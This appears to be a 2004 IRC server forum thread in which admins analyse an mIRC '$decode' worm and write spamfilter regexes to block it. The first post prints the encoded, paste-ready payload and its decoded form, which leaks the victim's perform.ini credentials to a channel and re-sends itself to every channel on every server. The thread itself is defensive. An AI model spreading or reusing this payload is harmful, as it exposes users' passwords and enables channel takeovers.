Page 1 of 2
mIRC $decode exploit
Posted: Mon Jun 21, 2004 3:56 am
by Stealth
The newest form of exploit for mIRC uses $decode.
This exploit is seen as lines that look like this:
Code: Select all
LOL! //echo -a $($decode(JGZpbmRmaWxlKC4sKiwxLHNjaWQgLWF0MSAuYW1zZyBMT0whICQhY2IoMSkgfCAucGxheSAj/SBwZXJmb3JtLmluaSk=,m),2)
Which when echoed, does this:
Code: Select all
//echo -a $findfile(.,*,1,scid -at1 .amsg LOL! $!cb(1) | .play <some channel> perform.ini)
This makes the persons perform.ini file visible to whoever is on the channel it is played to. Since alot of people use perform for identifying, this makes takeovers and such extremely easy. Along with that, it messages itself to all the channels you are on, on all the servers you are connected to. All the user sees is the first file in his/her mIRC folder Windows tells it. The rest are done as "silent" commands.
Not too good with regex, but here is a try:
Code: Select all
spamfilter {
regex ".* //echo -a \$\(\$decode\(.*,m\),[0-9]\);"
target channel;
action block;
reason "$decode exploit";
};
Posted: Mon Jun 21, 2004 2:46 pm
by aquanight
While I would agree with blocking any and all forms of $decode (if you want to send a file like that, use DCC), I think this regex would be good for blocking this specific exploit:
Code: Select all
^LOL! //echo -a \$(\$decode(.+,m),[0-9])$
(?: are the \'s necessary here? I blame .NET for making me think they are
)
Posted: Mon Jun 21, 2004 6:16 pm
by codemastr
You need the \ for ( and ), but not for $. () are metacharacters for grouping. The $ doesn't need it because the $ only has meaning at the end of a (sub)expression.
Posted: Mon Jun 21, 2004 9:40 pm
by Stealth
I think having .* at the beginnging is a good thing though, since it can have anything there to attract attention.
This does not block all of $decode, because of the $( in front of it. The $( tells mIRC to re-evauluate the output of $decode.
I have also noticed that the echo may have either of these swithces: a (active window) or s (status window)
From what everyone is saying, this regex should match it well enough:
Code: Select all
//echo -[as] $\($decode\(.+,m\),[0-9]\)
Posted: Tue Jun 22, 2004 1:34 am
by Syzop
I've added the following sig to CVS:
Code: Select all
spamfilter {
regex "^LOL! //echo -a \$\(\$decode\(.+,m\),[0-9]\)$";
target channel;
reason "$decode exploit";
action block;
};
Without escaping the $'s it didn't work here btw ;p.
noobs net
Posted: Wed Jun 30, 2004 8:53 am
by Gilou
Hi
Actually, the arrival of these bots also let us see (admin) that a lot of noobs were pasting the $decode thing, whatever it might contain, so, may it be paranoia, we decided to block $decode (with a terrible wildcarding), as it's quite useless, and if it does not damage anything, it's quite annoying running after noobs who lets stupid $decode things spread ...
I agree, $decode is useless...
Posted: Fri Jul 16, 2004 5:16 pm
by Terantula
... as I have never used it as a user in the years I have been chatting, so I have to agree with Gilou on this, blocking the use of the $decode is not a loss, but a fix to an long existing problem.
I put this spamfilter into my IRCd ASAP.
spamfilter {
regex ".*\$decode\.*";
target channel;
action block;
reason "$decode commands are not permitted on this server.";
};
I dont know anapple from regcode, so I hope this works...
Posted: Fri Jul 16, 2004 11:03 pm
by aquanight
just $decode by itself is enough...
and you might want to block $encode while you're at it
Posted: Mon Jul 19, 2004 8:14 pm
by Guest
Why? $encode cant be used for that type of exploit. It can create them, but it never gets said on the server...
Posted: Mon Jul 19, 2004 11:27 pm
by w00t
Unless it's been escaped.
Posted: Tue Jul 20, 2004 12:10 am
by Jason
Claims Guest Post Above
But that would only be a mistake. And isnt automatically for creating exploits, so a spamfilter GLINE etc on it wouldnt be good (I $encode my passwords in my connect script to prevent accidental showing to the person behind me. I certainly wouldnt want to be glined for accidentally missing a / on my //echo $encode(pass))
Posted: Wed Jul 21, 2004 12:55 am
by aquanight
Jason wrote:I certainly wouldnt want to be glined for accidentally missing a / on my //echo $encode(pass))
/echo doesn't even send to the server...
(Off-topic mIRC trick: hit tab after typing an identifier to evaluate it right then and there - only works on the command line (not in the script editor).
)
Posted: Thu Jul 22, 2004 12:40 am
by Jason
Oops, Just trying to make an example! Hows this:
//msg $me $encode(pass)
Posted: Thu Jul 22, 2004 4:00 am
by aquanight
Well, /msg NickServ $encode(pass) would be a better example, but I personally use /nickserv
.
Posted: Thu Jul 22, 2004 4:05 am
by Jason
$decode you mean, when actually sending it, you would want to decode, not encode